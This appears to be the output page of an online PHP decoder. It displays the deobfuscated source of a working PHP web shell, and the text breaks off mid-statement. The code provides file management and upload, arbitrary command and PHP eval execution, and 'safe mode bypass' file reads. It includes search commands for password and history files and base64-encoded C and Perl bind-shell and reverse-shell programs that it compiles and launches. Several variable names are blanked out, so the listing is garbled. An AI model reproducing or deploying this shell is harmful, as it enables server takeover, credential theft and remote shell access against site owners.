Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

{ $is_writable = is_writable($GLOBALS["\143\167\144"]) ? "\40\x3c\x66\157\156\x74\40\x63\x..

Decoded Output download

<?  { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#FFDB5F'>[ Writeable ]</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>\xa<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
\x9<tr>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
\x9</tr><tr>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\xa\x9</tr><tr>
\x9\x9<td><form onsubmit="" . (function_exists("actionConsole") ? "g('Console',null,this.c.value);" : '') . "return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>\xa		<td><form method='post' " . (!function_exists("actionFilesMan") ? " onsubmit="return false;" " : '') . "ENCTYPE='multipart/form-data'>\xa\x9	<input type=hidden name=a value='FilesMan'>
\x9	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa\x9	<input type=hidden name=p1 value='uploadFile'>
	\x9<input type=hidden name=ne value=''>\xa	\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
		<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>\xa	</tr></table></div>
	<!-- particles --> <div id='particles-js'></div><script src='http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
\x9<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>\xa	</body></html>"; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>
	function sa() {
\x9	for(i=0;i<d.files.elements.length;i++)
\x9		if(d.files.elements[i].type == 'checkbox')\xa\x9			d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>\xa\x9<input type=hidden name=ne value=''>
	<input type=hidden name=a value='FilesMan'>\xa	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa\x9<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\xb3 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit'></td></tr></form></table></div>"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3 Unable to execute command\xa"; } return $ == '' ? "\342\206\263 Query did not return anything
" : $; } goto YQzoR; r2c06: @ini_set("log_errors", 0); goto dPBlO; XGk3X: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Y2Zvy; TA8hx: $ = "UTF-8"; goto TQhs6; fqre7: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto hJVFy; ee0Wn: $ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\xa\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\xa	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
	</form>\xa\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
\x9<span>Back-connect to</span><br/>
	Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\xa\x9</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $ = ex(which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $ = ex(which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo "</div>"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "
"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\x0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "
"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\0") . "';
"; echo strlen($temp), "
", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["a"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["c"])) { $_POST["c"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["c"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p1"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p2"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if 